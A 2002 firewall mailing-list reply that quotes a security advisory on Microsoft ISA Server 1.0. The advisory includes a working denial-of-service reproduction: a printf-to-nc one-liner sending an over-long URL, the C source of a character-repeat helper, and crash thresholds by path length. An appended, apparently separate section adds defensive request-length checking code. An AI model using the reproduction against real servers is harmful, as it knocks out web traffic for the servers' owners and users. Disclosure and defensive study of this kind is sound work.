On Tue, 16 Apr 2002, Noonan, Wesley wrote:

> > Looking at the T1 as uplink, I won't suggest a BRICK... especially since
> > you only have 1 firewall in the network. If you would have home users
> > using DSL etc, I might change my mind though.
> >
> > > I was thinking about looking at newer PIXs, Microsoft ISA, and
> > > Checkpoint
> > > Firewall. Of course, I'm not sure where to begin. Any recommendations?
> >
> > Can someone please tell me why people like the Microsoft ISA Server?
>
> Because it works? Because last time I checked it had not a single exploit
> logged?
Your checking must be a bit outdated and incomplete. I just checked through
my Windows listings and found quite a few issues logged on ISA over the last
few years, some of which have been mentioned here before:

> --24 August 2001 Microsoft Releases IIS Lockdown Tool
> In the aftermath of Code Red, Microsoft released an IIS Lockdown Tool
> that disables many functions and services that could be exploited
> by attackers.
> http://www.computerworld.com/storyba/0,4125,NAV47_STO63310,00.html
> [Editor's (Schultz) Note: I understand the desire to turn off FTP
> and SMTP services, too, but I question the wisdom of doing this when
> the real problem is IIS Web servers. It is important to disable all
> unnecessary services, but having a tool that purports to fix IIS but
> then goes and does other things is not necessarily desirable.]
>
> --17 August 2001 Patch Available for ISA Server 2000 Flaws
> Microsoft has issued a patch to repair three holes in its Internet
> Security and Acceleration (ISA) Server 2000. Two of the flaws are
> memory leaks: one in the voice-over-IP capability, and one in the
> proxy service that could lead to denial of service. The third is an
> error message-handling problem that could allow attackers to execute
> malicious code and use cookies on the affected machines.
> http://computerworld.com/nlt/1%2C3590%2CNAV65-663_STO63199_NLTSEC%2C00.html

From: SecureXpert DIRECT Bulletin Service <[EMAIL PROTECTED]>
Subject: [SX-20010320-2] - Microsoft ISA Server Denial of Service
Date: Mon, 16 Apr 2001 11:47:59 -0400
To: [EMAIL PROTECTED]

FSC Internet Corp. / SecureXpert Labs Advisory [SX-20010320-2]

Denial of Service in Microsoft ISA server v1.0

Summary

Microsoft ISA Server 1.0 on Windows 2000 Server SP1 is vulnerable to a
simple network-based attack which stops all incoming and outgoing web
traffic from passing through the firewall until the firewall is rebooted
or the affected service is restarted.
If the firewall is configured to use the "Web Publishing" feature (inbound
HTTP proxy to a web server), this attack can be performed remotely.

Details

Microsoft ISA server includes a web proxy component (W3PROXY.EXE) that is
used for both the "publishing" of internal web servers to the external
network and for proxying of internal requests to external web servers.

Sending a URL with a long pathname component to this proxy will cause it
to terminate with an access violation error. For example, sending the
(valid) HTTP request:

    GET http://hostname/aaa[3000 more occurrences of 'a'] HTTP/1.0\n\n

to port 80 on the ISA Server's external interface will cause W3PROXY.EXE
to terminate with an access violation.

This can easily be reproduced from a Linux system by using the following
simple shell command:

    printf 'GET http://${HOST}/%s HTTP/1.0\n\n' `./repeat ${x} ${y}` | \
        nc ${HOST} 80

where:

    - printf is the shell utility of that name
    - ${HOST} is an environment variable set to a hostname which resolves
      to the external IP of the ISA server
    - ./repeat is the simple C program whose source is given below
    - ${x} is the ASCII value of the character to insert into the
      generated URL
    - ${y} is the number of repetitions of ${x}

The `repeat' program can be compiled from the following simple C source:

    /*
     * repeat.c -- quick-n-dirty hack to output argv[2] instances of the
     * character whose ASCII value is given as argv[1]
     *
     * WARNING - this has absolutely no error checking!
     */
    #include <stdio.h>
    #include <stdlib.h>   /* atoi, atol, exit */

    int main (int argc, char **argv)
    {
        int character;
        long repetitions, i;

        if ( argc != 3 ) {
            printf("usage: repeat char reps\n");
            exit(1);
        }
        character = atoi(argv[1]);      /* ASCII value of the character */
        repetitions = atol(argv[2]);    /* how many copies to emit */
        for (i = 0L; i < repetitions; i++) {
            printf ("%c", character);
        }
        return 0;
    }

The behaviour of W3PROXY.EXE is dependent both on the value of ${x} and
the value of ${y}.
With ${x} of 55, the following behaviour is observed based on the value
of ${y}:

    100:  processes correctly, returns "404 Object Not Found" from target
          web server.
    200:  returns 404
    250:  returns 404
    254:  returns 404
    255:  returns "414 URL Too Long"
    260:  returns 414
    300:  returns 414
    2000: returns 414
    2100: returns 414
    2200: returns 414
    2300: returns 414
    2300, repeated several times: W3PROXY.EXE grows to 128MB of process
          size and is then terminated with an access violation.
    2350: W3PROXY.EXE is terminated on the first attempt.
    All larger values: as 2350, above.

...

> > > Without a proper firewall protecting the ISA Server it's just going to be
> > > the
> > > single point of failure.
>
> Are you really this uninformed, or are you just playing the part on the net?

That's an awfully aggressive statement considering the above.

Thanks,

Ron DuFresne
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"Cutting the space budget really restores my faith in humanity. It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation." -- Johnny Hart
***testing, only testing, and damn good at it too!***

OK, so you're a Ph.D. Just don't touch anything.

_______________________________________________
Firewalls mailing list
[EMAIL PROTECTED]
http://lists.gnac.net/mailman/listinfo/firewalls
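A defensive counterpart to the advisory quoted above, added here as an example; it is not part of the advisory, the thread, or any Microsoft or ISA Server code. The advisory's data show the proxy answering "414 URL Too Long" for mid-sized paths but failing outright once the path passes roughly 2300 characters, so the point a practitioner wants is a request-line length guard applied in front of such a parser: it bounds the request-target well below the failure range and turns an over-long request into a clean 414 before the fragile component ever sees it. The 1024-byte target limit, the 8192-byte line limit, the function names and the constructed sample request lines (built with the same "repeat a character n times" pattern the advisory uses) are all assumptions of this example.

```c
/*
 * Added example (not from the advisory or the thread): a front-end
 * request-line guard. It parses "METHOD request-target HTTP/x.y",
 * rejects malformed lines with 400 and over-long targets with 414,
 * so that a downstream parser that cannot cope with very long paths
 * never receives them. Limits below are assumed values for this example.
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define MAX_TARGET_LEN 1024   /* assumed: far below the ~2300 failure range */
#define MAX_LINE_LEN   8192   /* assumed: size of the read buffer */

/* Returns an HTTP status: 0 = accept, 400 = malformed, 414 = too long. */
int check_request_line(const char *line)
{
    size_t len = strlen(line);
    if (len == 0) return 400;
    if (len > MAX_LINE_LEN) return 414;   /* line exceeds the read buffer */

    const char *sp1 = strchr(line, ' ');
    if (sp1 == NULL || sp1 == line) return 400;      /* no method token */

    const char *target = sp1 + 1;
    const char *sp2 = strchr(target, ' ');
    if (sp2 == NULL || sp2 == target) return 400;    /* no target or version */

    if (strncmp(sp2 + 1, "HTTP/", 5) != 0) return 400;   /* bad version */
    if (strchr(sp2 + 1, ' ') != NULL) return 400;        /* extra fields */

    /* Length check on the request-target alone, before anything parses it. */
    size_t target_len = (size_t)(sp2 - target);
    if (target_len > MAX_TARGET_LEN) return 414;
    return 0;
}

/* Constructed test input: "GET http://hostname/<n copies of c> HTTP/1.0",
 * mirroring the repeat|nc pattern in the advisory. Caller frees. */
char *make_request_line(size_t n, char c)
{
    const char *prefix = "GET http://hostname/";
    const char *suffix = " HTTP/1.0";
    size_t plen = strlen(prefix);
    char *buf = malloc(plen + n + strlen(suffix) + 1);
    if (buf == NULL) return NULL;
    memcpy(buf, prefix, plen);
    memset(buf + plen, c, n);
    strcpy(buf + plen + n, suffix);
    return buf;
}

int main(void)
{
    /* Path lengths taken from the advisory's table, plus the 3000-char case. */
    size_t sizes[] = {100, 255, 2300, 2350, 3000};
    for (size_t i = 0; i < sizeof sizes / sizeof sizes[0]; i++) {
        char *req = make_request_line(sizes[i], 'a');
        if (req == NULL) return 1;
        printf("path length %5zu -> %d\n", sizes[i], check_request_line(req));
        free(req);
    }
    printf("malformed line   -> %d\n", check_request_line("GET"));
    return 0;
}
```

The guard is defence in depth, not a substitute for the vendor patch the thread mentions: it keeps the request sizes at which the advisory reports process growth and access violations from reaching the proxy, and it makes the rejection visible as a 414 in the front-end's own logs, where a burst of them from one source is easy to alert on.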
